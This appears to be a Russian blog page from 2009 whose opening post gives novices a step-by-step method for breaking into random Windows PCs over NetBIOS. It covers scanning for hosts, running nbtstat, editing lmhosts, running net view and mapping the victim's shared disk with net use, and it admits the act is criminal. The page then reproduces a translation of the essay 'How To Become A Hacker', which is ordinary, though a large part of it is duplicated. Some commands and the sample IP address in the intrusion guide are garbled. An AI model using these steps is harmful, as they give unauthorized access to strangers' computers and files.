Всем привет! Я пишу свою первую статью на хакзоне, надеюсь она комунибуть пригодится )) думаю из названия статьи вы уже поняли что за этот взлом идет уголовная ответственность, и самое плохое что вы даже не знаете на чей ПК вы попали, следовательно можете качать даже секретные данные СБУ, и т.д. Но у этого взлома есть и свои плюсы: вам не понадобится почти никакого софта. Весь софт предоставила нам Форточка, но все же одну прогу скачать вам понадобится. Заходим на сайт http//www.xakep.ru и в строке "поиск" пишем "xSHaReZ" (без ковычек!!). Из всего найденного кликаем по самой верхней, находим сканер и качаем. Для того чтобы взлом прошел успешно нам нужно установить клиент сетей Майкрософт и протокол "NetBIOS". Это вы должны уметь и сами. Сканер производит сканирование портов ваших жертв. После загляните в раздел "логи" и если вы увидите примерно такое:
IP адрес 62.171.274.1
Имя компа: VASYA
Имя юзера за компом: MAKAROV
Рабочая группа: VASYA
то у вас есть шанс. Теперь заходим в Пусквыполнть и набираем:
"nbtstat.exe - A ip.ad.re.ss" ip.ad.re.ss - тот который выдал сканер (у нас это 62.171.274.1) после клика по вводу окно доса выдаст вам что-то такое:
VASYA <00> UNIQUE
VASYA <15> UNIQUE
SERVER <00> GROUP
SERVER <1C> GROUP
SERVER <1E> GROUP
VASYA <05> UNIQUE
MAC Adress = 00-00-00-00-00-00
Теперь будем искать на форточке файл "Imhosts". Открываем поиск и ищем. Изначально он пустой. Пишем в него "ip.ad.re.ss VASYA #pre". Сохраняем. Опять идем в выполнить и печатаем: "netview VASYA". Если вам повезло и вы увидите такое:
Share name Type
---------------------------------
MyDisk Disk
Obshiye Disk
Команда выполнена успешна
Взлом удался. Если же нет, то попробуйте все заново, а лучше с другим ПК. Но если вам повезло и все прошло успешно заходим в выполнить и пишем:
"net use x: VASYAMyDisk". Все, его ПК ваш. Идем в "мой компьютер", в нем появился новый диск "Х" )).
L
суббота, 31 октября 2009 г.
Начинающим хакерам!
Что такое хэкер?
"Жаргон-файл" содержит кучу определений для термина "хэкер", большинство которых связано с технической компетентностью и удовольствием, получаемым от решения проблем и преодоления преград. Но если же вы хотите знать, как стать хэкером, то действительно существенными являются два аспекта.
Имеется некоторое сообщество, некая общая культура, состоящая из опытных программистов и сетевых чародеев, которая ведет свою историю от многолетней давности первых миникомпьютеров с разделением времени и от самых ранних экспериментов с сетью ARPAnet. Члены этой культуры и дали рождение термину "хэкер". Хэкеры построили Интернет. Хэкеры сделали операционную систему Unix тем, чем она является сегодня. Хэкеры ведут Usenet. Хэкеры обеспечивают работу World Wide Web. Если вы являетесь частью этой культуры, если вы сделали в нее свой вклад, и другие члены этой культуры знают кто вы и называют вас хэкером, то вы - хэкер.
Хэкерский взгляд на мир не ограничивается лишь культурой хэкеров-программистов. Есть люди, применяющие хэкерский подход и к другим вещам, вроде электроники или музыки. В действительности, вы можете встретиться с ним на высших уровнях любой науки или искусства. Софтверные хэкеры признают таких близких по духу людей и тоже могут называть их "хэкерами", некоторые даже провозглашают, что хэкерская природа на самом деле не зависит от среды, в которой работает хэкер. Но в остальной части данного документа мы сосредоточимся на навыках и подходах софтверных хэкеров, а также на традициях той общей культуры, что породила термин "хэкер".
Имеется и другая группа людей, громко именующих себя хэкерами, но они ими не являются. Это те люди (главным образом, молодежь мужского пола), кого тягают за взлом компьютерных и телефонных систем. Настоящие хэкеры называют таких людей "крэкерами" и не желают иметь с ними ничего общего. Настоящие хэкеры в большинстве своем считают крэкеров ленивыми, безответственными и не особо умными. То, что человек способен взломать систему безопасности, не делает его хэкером, точно так же как умение угонять тачки не делает вас автомобильным мастером. К несчастью, многие журналисты и писатели введены в заблуждение и используют слово "хакер" для описания крэкеров, и это бесконечно раздражает настоящих хэкеров.
Главное различие в следующем: хэкеры строят вещи, а крэкеры их ломают.
Если вы хотите стать хэкером, то продолжайте чтение. Если же вы хотите стать крэкером, то отправляйтесь читать ньюз-группу alt.2600 и приготовьтесь отсидеть от пяти до десяти лет в тюрьме, когда обнаружите, что не настолько ловки, насколько полагали. И это все, что я намерен сказать о крэкерах.
Хэкерский подход
Хэкеры решают проблемы и строят вещи, они верят в свободу и в добровольную взаимопомощь. Для того, чтобы вас воспринимали как хэкера, вы должны вести себя так, как если бы это была ваша собственная позиция. А для того, чтобы вести себя так, будто это ваша позиция, вы должны действительно верить в эту позицию.
Но если вы рассчитываете культивировать хэкерские подходы лишь для получения признания в культуре, то вы упустили суть. Стать таким человеком, кто верит в подобные вещи - это важно для вас, потому что это поможет вам научиться и поддержит стремление. Как и в любом творчестве, самый эффективный способ стать мастером - это подражать мировоззрению мастеров, не только интеллектуально, но также и эмоционально.
Так что если вы хотите стать хэкером, то повторяйте следующие вещи, пока не поверите в них:
1. Мир полон пленительных проблем, ждущих своего решения.
Быть хэкером - это огромное удовольствие, но это удовольствие такого рода, которое требует массы усилий. Для таких усилий нужна мотивация. Атлеты-чемпионы черпают мотивацию из своего рода физического удовольствия, получаемого от доведения собственного тела до совершенства, от преодоления собственных физических пределов. Подобно этому, чтобы быть хэкером вы должны получать максимум удовольствия от решения проблем, от оттачивания своих навыков, от тренировки своего интеллекта.
Если же вы не из тех, кто ощущает подобные вещи естественным образом, то вам понадобится стать таким, чтобы сделаться хэкером. В противном случае вы обнаружите, что вся ваша хэкерская энергия исчерпана такими раздражителями, как секс, деньги и успех в обществе.
(Вы также должны развить что-то вроде веры в ваши собственные способности к обучению. Веры в то, что даже если вы возможно и не знаете всего, что необходимо для решения проблемы, но если вы освоили лишь кусочек и на этом научились, то уже знаете достаточно, чтобы решить и следующий кусок - и так далее, пока все не будет сделано.)
2. Никто и никогда не должен решать проблему дважды.
Творческие мозги - это ценный и ограниченный ресурс. Не следует растрачивать их на переизобретение колеса, когда вокруг ожидает так много чудеснейших новых проблем.
Чтобы вести себя как хэкер, вы должны верить, что время размышлений других хэкеров - драгоценно, причем настолько, что почти моральным долгом для вас является поделиться информацией. Решить проблемы, а затем просто раздать решения, чтобы другие хэкеры могли решать новые проблемы вместо того, чтобы беспрестанно возвращаться к старым.
(От вас не требуется верить, что вы обязаны раздать все плоды своего творчества, хотя те хэкеры, кто так делает, - наиболее уважаемы среди других хэкеров. С ценностями хэкеров вполне согласуется продажа плодов творчества, достаточная для обеспечения вас пищей, кровом и компьютерами. Согласуется это и с использованием ваших хэкерских навыков для поддержания семьи и даже для того, чтобы разбогатеть, пока занимаясь этим вы не забываете, что являетесь хэкером.)
3. Скука и рутина - это зло.
Хэкеры (и вообще творческие люди) никогда не должны заниматься скучными вещами или погрязать в рутине монотонной работы, потому что когда это происходит, то это означает, что они не делают того, что могут делать лишь они - решать новые проблемы. Подобное расточительство вредит каждому. Поэтому скука и рутина - это не просто неприятные вещи, это зло.
Чтобы вести себя как хэкер, вы должны верить в это так, чтобы желать автоматизации всех скучных мелочей настолько, насколько возможно, и не только для себя, но и для всех остальных (особенно, для других хэкеров).
(Имеется одно явное исключение. Иногда хэкеры занимаются вещами, которые могут показаться монотонными или скучными стороннему наблюдателю, в качестве упражнения для прочистки мозгов или же для выработки навыка. Либо же для приобретения особого рода опыта, который невозможно получить иным путем. Но все это делается по собственному выбору, никто из умеющих думать никогда не должен принуждаться к скучной работе.)
4. Свобода - это благо.
Хэкеры по самой своей природе анти-авторитарны. Любой, кто может отдавать вам приказания, может остановить решение вами любой из проблем, вас очаровавших. И, учитывая образ мышления авторитарных мозгов, найдутся какие-нибудь потрясающе идиотские причины, чтобы это сделать. Так что с авторитарным подходом следует сражаться всюду, где вы его встретите, дабы он не душил вас и других хэкеров.
(Это не то же самое, что сражаться со всеми властями. Детям нужно руководство, преступность необходимо сдерживать. Хэкер может соглашаться на принятие какого-то рода руководства, когда есть возможность получить то, что нужно и не особо много времени тратится на выполнение приказов. Но это ограниченная разумная сделка, что-то вроде личной уступки.)
Авторитаризм процветает в условиях цензуры и секретности. Его адепты не верят в добровольное сотрудничество и в деление информацией, им нравится только такое "сотрудничество", которым руководят они. Поэтому, чтобы вести себя как хэкер, вы должны выработать в себе инстинктивное неприятие цензуры, секретности, а также применения силы или лжи для принуждения ответственных взрослых людей. И действовать необходимо исходя из такой веры.
5. Позиция не заменит компетентность.
Для того, чтобы быть хэкером, вы должны развить в себе некоторые из перечисленных подходов. Но ухватив лишь подход вы сделаетесь хэкером не в большей степени, чем спортсменом-рекордсменом или рок-звездой. Для того, чтобы стать хэкером, требуются интеллект, практика, самоотверженность и тяжкий труд.
Поэтому вам придется научиться с недоверием относится к позиции, но с уважением к компетентности любого рода. Хэкеры не позволят позерам транжирить их время, но они поклоняются компетентности, особенно - хэкерской компетентности, но компетентность хороша в чем угодно. Особо ценится обладание такими необходимыми навыками, которые мало у кого есть. А самое лучшее - это компетентность в таких навыках, которые требуют проницательного ума, сноровки и концентрации.
Если вы боготворите компетентность, то вы получаете наслаждение, развивая ее в себе. Тяжкий труд и преданность делу станут для вас захватывающей игрой, а не рутиной. И это жизненно необходимо для того, чтобы стать хэкером.
Основные навыки хэкера
Хэкерский взгляд на жизнь - это важно, но мастерство - многократно важнее. Позиция не заменит компетентости, и существует определенный набор базовых навыков, которыми вам необходимо обладать, прежде чем любой из хэкеров помыслит назвать хэкером и вас.
Этот базовый набор со временем потихоньку изменяется по мере того, как технология порождает новые навыки и делает ненужными устаревшие. Например, обычно упоминалось программирование на машинном языке, но, вплоть до недавнего времени, в набор не включали язык HTML. Однако, в сегодняшний комплект вполне определенно входят следующие компоненты:
1. Научитесь программировать.
Это, конечно же, фундаментальный хэкерский навык. Если вы не знаете ни одного компьютерного языка, я рекомендовал бы начать с языка Python. Он понятно разработан, хорошо документирован и относительно доброжелателен к новичкам. Несмотря на то, что он хорош для первого языка, это не просто игрушка. Это очень мощный и гибкий язык, хорошо подходящий для больших проектов.
Но знайте, что вы не достигнете хэкерского уровня мастерства (или даже просто уровня хорошего программиста), если будете знать лишь один язык. Вам необходимо научиться мыслить о проблемах программирования вообще, независимо от любого конкретного языка. Чтобы быть настоящим хэкером, вам надо достичь уровня, на котором вы сможете выучить новый язык за несколько дней, соотнося положения руководства с тем, что вам уже известно. Это означает, что вам следует выучить несколько очень разных языков.
Если вы занимаетесь серьезным программированием, то вам придется выучить Си, основной язык операционной системы Unix (хотя это и не тот язык, который следует пытаться выучить первым). Другие языки первостепенной важности для хэкеров - это Perl и LISP. Язык Perl имеет смысл выучить из практических соображений: он очень широко используется для активных web-страниц и системного администрирования, так что даже если вам никогда не придется писать на Perl, вы должны научиться его читать. LISP стоит выучить ради тех глубоких просвещенных познаний, которые вы обретете, когда наконец его освоите. Эти познания сделают вас прекрасным программистом на всю оставшуюся жизнь, даже если вы никогда особо и не будете использовать сам LISP.
Лучше всего, на самом деле, выучить все четыре этих языка (Python, C, Perl, и LISP). Помимо того, что это самые важные хэкерские языки, они демонстрируют очень разные подходы к программированию и каждый из них научит вас ценным вещам.
Я не могу дать здесь развернутые инструкции относительно того, как научиться программировать, - это сложное искусство. Но я могу сказать вам, что книги и курсы этому не научат (многие, возможно, большинство лучших хэкеров - это самоучки). Что этому учит, так это (а) чтение кодов и (б) писание кодов .
Научиться программировать - это как научиться писать хорошим естественным языком. Самый лучший способ для этого - почитать что-то из написанного мастерами, затем написать немного самому; прочесть побольше, написать немного побольше; прочитать еще больше, написать еще побольше... И повторять этот процесс до тех пор, пока ваши программы не разовьются в нечто мощное и экономичное.
Отыскать хорошие коды для чтения раньше было сложно, потому что было очень мало больших программ, доступных в исходных кодах и пригодных для изучения и возни юных хэкеров. Ныне ситуация кардинально изменилась: программы в исходных кодах, программистский инструментарий и операционные системы (все это создано хэкерами) теперь широко доступны. Что подводит меня прямо к следующему разделу...
2. Достаньте один из вариантов Unix в исходных кодах, научитесь его использовать и с ним работать.
Я полагаю, что вы имеете персональный компьютер или можете получить к нему доступ (сегодня этим ребятам все достается так легко :-)). Единственный и самый важный шаг, который любой из новичков может предпринять для приобретения хэкерских навыков, - это раздобыть копию Linux или одной из версий BSD-Unix, установить ее на персональной машине и запустить.
Да, в мире есть и другие операционные системы помимо Unix. Но их распространяют в двоичном виде - вы не сможете читать коды и не сможете их модифицировать. Учиться хэкерству на машинах, работающих под DOS, Windows или MacOS - это все равно что учиться танцевать полностью загипсованным.
Кроме того, Unix - это операционная система Интернета. Хотя вы можете научиться использовать Интернет и не зная Unix, но вы не можете быть Интернет-хэкером, не понимая Unix. По этой самой причине сегодняшняя хэкерская культура является весьма сильно Unix-сконцентрированной. (Это не всегда было так, и некоторым из прежних хэкеров такое положение дел не очень по нраву, но симбиоз между Unix и Интернетом стал настолько прочен, что даже сил Microsoft не хватает, чтобы серьезно на это влиять.)
Так что заводите себе Unix, мне самому нравится Linux, но есть и другие варианты (и да-да, вы можете работать как под Linux, так и под DOS/Windows на одной и той же машине). Выучите эту ОС. Работайте с ней. Возитесь с ней. Общайтесь через нее с Интернетом. Читайте коды. Модифицируйте их. Вы получите такой программистский инструментарий (включая C, Lisp и Perl), о котором любая из ОС Microsoft и не мечтала. Вы получите удовольствие, и вы усвоите больше знаний, чем предполагали в процессе обучения, когда оглянетесь на этот процесс уже будучи мастером-хэкером.
Для дополнительной информации об изучении Unix см. The Loginataka.
Чтобы заполучить в свои руки Linux, см. Where can I get Linux ("Где мне взять Linux").
3. Научитесь использовать World Wide Web и писать на HTML.
Большинство из тех вещей, что созданы хэкерской культурой, делают свое дело невидимо, помогая работать фабрикам, учреждениям и университетам без сколь-нибудь заметного влияния на жизнь не-хэкеров. WWW - это одно большое исключение, гигантская блестящая хэкерская игрушка, которая даже по признанию политиков изменяет мир. Лишь по одной этой причине (а также и множеству других приятных причин) вам следует научиться работать с Web.
Это не означает, что нужно просто научиться управляться с браузером (это любой умеет), но научиться писать на HTML, языке разметки документов Web. Если вы еще не умеете программировать, то писание на HTML обучит ваше мышление некоторым полезным привычкам, которые пригодятся при освоении языков программирования. Так что делайте домашнюю страничку.
Но простое обладание домашней страничкой даже и близко не подведет вас к тому, чтобы стать хэкером. В Web полным-полно домашних страничек. Большинство из них - это бессмысленный, бесполезный хлам. Крайне броско и привлекательно оформленный хлам, не спорю, но все равно хлам (подробнее об этом см. страничку "Ад HTML" -The HTML Hell Page).
Чтобы быть стоящей, ваша страничка должна иметь "контент" - содержание. Она должна быть интересной и / или полезной для других хэкеров. А это подводит нас к следующему разделу...
Статус в хэкерской культуре
Как и большинство культур без денежной экономики, Хэкерландия строится на репутации. Вы пытаетесь решить интересные проблемы, но вот насколько они интересны, и насколько в действительности хороши ваши решения, - это нечто такое, о чем обычно могут судить только (в техническом смысле) равные вам или превосходящие вас.
Таким образом, когда вы играете в хэкерские игры, вы учитесь вести счет главным образом по тому, что думают о вашем мастерстве другие (именно поэтому вы не будете хэкером до тех пор, пока вас не станут так называть другие хэкеры). Данный факт затеняют как образ хэкера-одиночки, так и определенные табу хэкерской культуры (ныне существенно ослабевшие, но все еще мощные), не допускающие, чтобы чье-то эго или внешнее признание вообще могли бы быть мотивацией для хэкера.
В частности, Хэкерландия - это то, что антропологи именуют "культурой даров". Вы зарабатываете статус и репутацию не тем, что руководите другими людьми, и не тем что прекрасны, и не тем что имеете вещи, которые являются предметом вожделения других. Но скорее тем, что раздаете вещи. В частности, одаривая своим временем, своим мастерством и результатами своего творчества.
Есть пять основных типов вещей, которые вы можете делать, чтобы вас уважали хэкеры:
1. Пишите программы с открытым исходным кодом.
Первое (самое главное и самое традиционное) - это писать программы, которые другие хэкеры считают забавными или полезными, и раздавать исходные коды программ для использования всей хэкерской культурой.
Мы привыкли называть такую работу "свободно-доступным программным обеспечением" (free software), но это привело в замешательство очень многих людей, точно не понимавших, что подразумевалось под словом "свободно-доступное". Теперь для такого программного обеспечения многие из нас предпочитают использовать термин "с открытым исходным кодом" или "open-source software".
Наиболее почитаемые полубоги Хэкерландии - это люди, которые написали большие и талантливые программы, отвечающие самым широким потребностям, и которые раздали их всем, так что каждый теперь их использует.
2. Помогайте тестировать и отлаживать программы с открытым исходным кодом
Почитаемы также те, кто тестирует и отлаживает программы с открытым кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.
Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее, к помощи в их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.
3. Публикуйте полезную информацию.
Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документах типа ЧаВО (FAQ или "часто задаваемые вопросы и ответы"), и делать их общедоступными.
Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходным кодом.
4. Помогайте поддерживать работу инфраструктуры.
Хэкерская культура (и инженерная разработка Интернет, к слову сказать) основана на добровольцах. Имеется масса необходимой, но не особо эффектной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирование новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.
Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Эта работа свидетельствует о самоотверженности.
5. Служите самой хэкерской культуре.
Наконец, вы можете служить и распространять саму культуру (например, составляя скрупулезное руководство "как стать хэкером" :-)). Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.
В хэкерской культуре нет явных лидеров, но здесь есть "культурные герои", "племенные старейшины", историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного из таких людей. Но остерегайтесь: хэкеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно быть скромным и милостивым в своем статусе.
Связь между хэкером и придурком
Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хэкером. Это, однако, помогает, и многие хэкеры действительно "придурки". Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышления и хэкерство.
Именно по этой причине многие хэкеры носят ярлык "придурок" и даже используют в качестве знака доблести более грубый термин "кретин" - это их способ декларации своей независимости от общепринятых в обществе оценок. С развернутой дискуссией по этому поводу можно познакомиться на "странице придурков" - The Geek Page.
Если вы способны в достаточной степени сосредоточиться на хэкерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче, чем в 1970-е, когда был новичком я. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придуркам. Есть даже растущее количество людей, обнаруживающих, что хэкеры зачастую могут быть вполне качественными любовниками и супругами. Дополнительную информацию на этот счет можно почерпнуть на странице "Девушкам о ребятах-придурках" - Girl's Guide to Geek Guys.
Если же вас влечет к хэкерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.
Черты образа жизни
Еще раз, чтобы быть хэкером, вы должны обрести мировоззрение хэкера. Есть несколько вещей, которые могут помочь в те моменты, когда вы не находитесь рядом с компьютером. Они не заменяют хэкерство (его ничто не заменит), но многие хэкеры ими занимаются и, по их ощущениям, это на каком-то фундаментальном уровне объединяет их с сутью хэкерства.
Читайте научную фантастику. Ходите на встречи любителей фантастики (это хороший способ познакомиться с хэкерами и "прото-хэкерами").
Изучайте Дзэн-буддизм и/или восточные искусства боя. (Их ментальная дисциплина имеет, похоже, важные черты сходства).
Вырабатывайте в себе аналитический музыкальный слух. Учитесь понимать специфические виды музыки. Учитесь неплохо играть на каком-нибудь музыкальном инструменте или грамотно петь.
Вырабатывайте в себе понимание каламбуров и игр в слова.
Учитесь хорошо писать на своем родном языке. (Удивительно многие из хэкеров, включая всех известных мне лучших хэкеров, являются качественными писателями.)
Чем больше из этих вещей вы уже делаете, тем больше вероятность того, что вы представляете собой природный хэкерский материал. Почему перечислены именно эти вещи - не вполне ясно, но они связаны со смешиванием навыков левого и правого полушарий мозга, а это представляется важным (для хэкеров необходимо уметь как выстраивать стройные логические обоснования, так и время от времени оценивать проблему вне связи с очевидной логикой).
И, наконец, несколько вещей, которые делать не следует.
Не используйте глупые и напыщенные пользовательские имена или клички.
Не вовлекайтесь в свары и перебранки в Usenet (или где-либо еще).
Не называйте себя "кибер-панком" и не тратьте свое время на тех, кто это делает.
Не отправляйте письма или электронную почту, переполненные ошибками правописания.
Единственная репутация, которую вы себе создадите, занимаясь любой из этих вещей - это посмешище. У хэкеров длинная память, и вам могут понадобиться годы жизни, чтобы об этом забыли.
Другие ресурсы
Питер Сибак ведет превосходную страницу "Хэкер-ЧаВО" - Hacker FAQ для менеджеров, не представляющих себе как иметь дела с хэкерами.
Мною написана также "Краткая история Хэкерландии" - A Brief History Of Hackerdom.
Я написал статью "Храм и Базар" - The Cathedral and the Bazaar, в которой разъясняется, как работают проект Linux и культура открытых исходных кодов. Еще более непосредственно эта же тема рассмотрена в статье-продолжении "Раздел Ноосферы" - Homesteading the Noosphere.
Часто задаваемые вопросы
В: Вы научите меня хэкерству?
С момента первой публикации этой страницы я получал от людей по нескольку запросов в неделю с просьбой "научить всему хэкерскому". К сожалению, я не располагаю ни временем, ни энергией этим заниматься. Мои собственные хэкерские проекты занимают 110% моего времени.
И даже если бы они у меня были, хэкерство - это мировоззрение и мастерство, которым вы должны научиться в основном сами. Вы обнаружите, что хотя настоящие хэкеры и желают вам помочь, но они не будут вас уважать, если вы станете просить накормить вас с ложечки всем, что им известно.
Сначала научитесь нескольким вещам сами. Покажите, что стараетесь, что способны к самостоятельному обучению. И уже потом отправляйтесь к знакомым хэкерам с вопросами.
В: Не поможете ли вы мне крэкнуть систему, или может научите, как их вскрывать?
Нет. Любой, кто может опять задавать подобный вопрос по прочтении данного текста, - бестолков настолько, что его ничему нельзя научить, даже если бы у меня было на это время. Любые подобные просьбы будут проигнорированы, либо же ответ будет крайне грубым.
Где мне найти настоящих хэкеров, чтобы с ними поговорить?
Самый лучший способ - найти вашу местную группу пользователей Unix или Linux и сходить на их встречи (ссылки на несколько списков групп пользователей можно найти на странице LDP на Sunsite).
(Как-то раньше я сказал, что вам не найти ни одного настоящего хэкера в чатах, но мне дали понять, что ситуация меняется. Очевидно, некоторые из сообществ настоящих хэкеров, связанных с такими вещами как GIMP и Perl, теперь имеют свои IRC-каналы.)
В: Какой язык следует выучить первым?
HTML, если вы его еще не знаете. Есть масса расфуфыренных и потрясающе бездарных книг по HTML, но обескураживающе мало хороших. Мне больше всего нравится HTML: The Definitive Guide.
Но HTML - это не полноценный язык программирования. Когда вы почувствуете, что готовы начать программировать, я бы порекомендовал начать с языка Python. Многие люди будут рекомендовать вам начинать с Perl, и этот язык более популярен чем Python, но его сложнее выучить.
Си - действительно важный язык, но он и намного сложнее, нежели Python или Perl. Не пытайтесь выучить его первым.
В: А не станет ли так, что из-за программ с открытым исходным кодом программистам будет не на что жить?
Ну, это вряд ли. Пока что, похоже, индустрия программного обеспечения с открытым исходным кодом скорее создает рабочие места, нежели их сокращает. Если экономически более прибыльно иметь написанную программу, чем такой программы не иметь, то программисту будут платить независимо от того, станет ли эта программа бесплатной после ее создания. И, независимо от того, как много будет написано "бесплатных" программ, всегда еще больше будет запросов на новые и специализированные приложения. Более подробно я написал об этом на страницах Open Source.
В: Как мне начать? Где можно достать бесплатный Unix?
Повсюду на этой странице я вставил указатели на те места, где можно взять наиболее широко используемые бесплатные версии Unix. Чтобы быть хэкером, вам нужны мотивация и инициатива, а также способность к самообразованию. Начинайте прямо сейчас...
"Жаргон-файл" содержит кучу определений для термина "хэкер", большинство которых связано с технической компетентностью и удовольствием, получаемым от решения проблем и преодоления преград. Но если же вы хотите знать, как стать хэкером, то действительно существенными являются два аспекта.
Имеется некоторое сообщество, некая общая культура, состоящая из опытных программистов и сетевых чародеев, которая ведет свою историю от многолетней давности первых миникомпьютеров с разделением времени и от самых ранних экспериментов с сетью ARPAnet. Члены этой культуры и дали рождение термину "хэкер". Хэкеры построили Интернет. Хэкеры сделали операционную систему Unix тем, чем она является сегодня. Хэкеры ведут Usenet. Хэкеры обеспечивают работу World Wide Web. Если вы являетесь частью этой культуры, если вы сделали в нее свой вклад, и другие члены этой культуры знают кто вы и называют вас хэкером, то вы - хэкер.
Хэкерский взгляд на мир не ограничивается лишь культурой хэкеров-программистов. Есть люди, применяющие хэкерский подход и к другим вещам, вроде электроники или музыки. В действительности, вы можете встретиться с ним на высших уровнях любой науки или искусства. Софтверные хэкеры признают таких близких по духу людей и тоже могут называть их "хэкерами", некоторые даже провозглашают, что хэкерская природа на самом деле не зависит от среды, в которой работает хэкер. Но в остальной части данного документа мы сосредоточимся на навыках и подходах софтверных хэкеров, а также на традициях той общей культуры, что породила термин "хэкер".
Имеется и другая группа людей, громко именующих себя хэкерами, но они ими не являются. Это те люди (главным образом, молодежь мужского пола), кого тягают за взлом компьютерных и телефонных систем. Настоящие хэкеры называют таких людей "крэкерами" и не желают иметь с ними ничего общего. Настоящие хэкеры в большинстве своем считают крэкеров ленивыми, безответственными и не особо умными. То, что человек способен взломать систему безопасности, не делает его хэкером, точно так же как умение угонять тачки не делает вас автомобильным мастером. К несчастью, многие журналисты и писатели введены в заблуждение и используют слово "хакер" для описания крэкеров, и это бесконечно раздражает настоящих хэкеров.
Главное различие в следующем: хэкеры строят вещи, а крэкеры их ломают.
Если вы хотите стать хэкером, то продолжайте чтение. Если же вы хотите стать крэкером, то отправляйтесь читать ньюз-группу alt.2600 и приготовьтесь отсидеть от пяти до десяти лет в тюрьме, когда обнаружите, что не настолько ловки, насколько полагали. И это все, что я намерен сказать о крэкерах.
Хэкерский подход
Хэкеры решают проблемы и строят вещи, они верят в свободу и в добровольную взаимопомощь. Для того, чтобы вас воспринимали как хэкера, вы должны вести себя так, как если бы это была ваша собственная позиция. А для того, чтобы вести себя так, будто это ваша позиция, вы должны действительно верить в эту позицию.
Но если вы рассчитываете культивировать хэкерские подходы лишь для получения признания в культуре, то вы упустили суть. Стать таким человеком, кто верит в подобные вещи - это важно для вас, потому что это поможет вам научиться и поддержит стремление. Как и в любом творчестве, самый эффективный способ стать мастером - это подражать мировоззрению мастеров, не только интеллектуально, но также и эмоционально.
Так что если вы хотите стать хэкером, то повторяйте следующие вещи, пока не поверите в них:
1. Мир полон пленительных проблем, ждущих своего решения.
Быть хэкером - это огромное удовольствие, но это удовольствие такого рода, которое требует массы усилий. Для таких усилий нужна мотивация. Атлеты-чемпионы черпают мотивацию из своего рода физического удовольствия, получаемого от доведения собственного тела до совершенства, от преодоления собственных физических пределов. Подобно этому, чтобы быть хэкером вы должны получать максимум удовольствия от решения проблем, от оттачивания своих навыков, от тренировки своего интеллекта.
Если же вы не из тех, кто ощущает подобные вещи естественным образом, то вам понадобится стать таким, чтобы сделаться хэкером. В противном случае вы обнаружите, что вся ваша хэкерская энергия исчерпана такими раздражителями, как секс, деньги и успех в обществе.
(Вы также должны развить что-то вроде веры в ваши собственные способности к обучению. Веры в то, что даже если вы возможно и не знаете всего, что необходимо для решения проблемы, но если вы освоили лишь кусочек и на этом научились, то уже знаете достаточно, чтобы решить и следующий кусок - и так далее, пока все не будет сделано.)
2. Никто и никогда не должен решать проблему дважды.
Творческие мозги - это ценный и ограниченный ресурс. Не следует растрачивать их на переизобретение колеса, когда вокруг ожидает так много чудеснейших новых проблем.
Чтобы вести себя как хэкер, вы должны верить, что время размышлений других хэкеров - драгоценно, причем настолько, что почти моральным долгом для вас является поделиться информацией. Решить проблемы, а затем просто раздать решения, чтобы другие хэкеры могли решать новые проблемы вместо того, чтобы беспрестанно возвращаться к старым.
(От вас не требуется верить, что вы обязаны раздать все плоды своего творчества, хотя те хэкеры, кто так делает, - наиболее уважаемы среди других хэкеров. С ценностями хэкеров вполне согласуется продажа плодов творчества, достаточная для обеспечения вас пищей, кровом и компьютерами. Согласуется это и с использованием ваших хэкерских навыков для поддержания семьи и даже для того, чтобы разбогатеть, пока занимаясь этим вы не забываете, что являетесь хэкером.)
3. Скука и рутина - это зло.
Хэкеры (и вообще творческие люди) никогда не должны заниматься скучными вещами или погрязать в рутине монотонной работы, потому что когда это происходит, то это означает, что они не делают того, что могут делать лишь они - решать новые проблемы. Подобное расточительство вредит каждому. Поэтому скука и рутина - это не просто неприятные вещи, это зло.
Чтобы вести себя как хэкер, вы должны верить в это так, чтобы желать автоматизации всех скучных мелочей настолько, насколько возможно, и не только для себя, но и для всех остальных (особенно, для других хэкеров).
(Имеется одно явное исключение. Иногда хэкеры занимаются вещами, которые могут показаться монотонными или скучными стороннему наблюдателю, в качестве упражнения для прочистки мозгов или же для выработки навыка. Либо же для приобретения особого рода опыта, который невозможно получить иным путем. Но все это делается по собственному выбору, никто из умеющих думать никогда не должен принуждаться к скучной работе.)
4. Свобода - это благо.
Хэкеры по самой своей природе анти-авторитарны. Любой, кто может отдавать вам приказания, может остановить решение вами любой из проблем, вас очаровавших. И, учитывая образ мышления авторитарных мозгов, найдутся какие-нибудь потрясающе идиотские причины, чтобы это сделать. Так что с авторитарным подходом следует сражаться всюду, где вы его встретите, дабы он не душил вас и других хэкеров.
(Это не то же самое, что сражаться со всеми властями. Детям нужно руководство, преступность необходимо сдерживать. Хэкер может соглашаться на принятие какого-то рода руководства, когда есть возможность получить то, что нужно и не особо много времени тратится на выполнение приказов. Но это ограниченная разумная сделка, что-то вроде личной уступки.)
